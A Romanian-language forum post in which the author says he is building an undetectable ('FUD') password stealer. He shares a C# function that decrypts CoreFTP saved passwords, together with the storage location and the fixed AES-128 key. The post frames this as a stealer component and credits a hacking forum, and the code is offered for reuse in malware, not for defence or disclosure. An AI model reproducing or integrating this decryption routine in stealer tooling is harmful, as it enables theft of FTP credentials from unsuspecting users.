Jump to content
dariusmare

[C# SOURCE] CoreFTP Password Decrypt

Recommended Posts

Salutare la toata lumea si Sarbatori Fericite! Acum ceva timp am inceput sa fac un stealer ceva mai complex, care va fi FUD, dar am intampinat o problema la CoreFTP. Parolele le puteam lua din "APPDATA\CoreFTP\sites.idx" problema era ca erau criptate si nu le puteam decripta. Toate sursele de stealere de pe internet erau doar pentru a gasi acel fisier "site.idx" si a renturna informatiile din el. Nu era nicaieri o metoda de decryptare. Acum cateva zile, am gasit pe un form, cineva care a reusit sa decripteze acea parola si m-am gandit sa va arat si voua, poate mai ajuta pe cineva. Ea era criptata cu AES, cu o cheie de 128biti, valoare HEX era apoi salvat in Registry. Cheia de encriptie este: hdfzpysvpzimorhk , cheie care tot timpul este aceasi(nu se schimba de la calculator la altul sau de la o versiune la alta. Tot acel cineav a si postat o functie de decryptare a parolelor din CoreFTP:

private static string DecryptCoreFTPPassword(string HexString)
{
StringBuilder buffer = new StringBuilder(HexString.Length * 3 / 2);
for (int i = 0; i < HexString.Length; i++)
{
if ((i > 0) & (i % 2 == 0))
buffer.Append("-");
buffer.Append(HexString[i]);
}

string Reversed = buffer.ToString();

int length = (Reversed.Length + 1) / 3;
byte[] arr = new byte[length];
for (int i = 0; i < length; i++)
{
arr[i] = Convert.ToByte(Reversed.Substring(3 * i, 2), 16);
}

RijndaelManaged AES = new RijndaelManaged()
{
Mode = CipherMode.ECB,
Key = Encoding.ASCII.GetBytes("hdfzpysvpzimorhk"),
Padding = PaddingMode.Zeros,
};
ICryptoTransform Transform = AES.CreateDecryptor(AES.Key, AES.IV);
return Encoding.UTF8.GetString(Transform.TransformFinalBlock(arr, 0, arr.Length));

}

Sursa: http://www.hackforums.net/showthread.php?tid=3959809

Edited by dariusmare
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...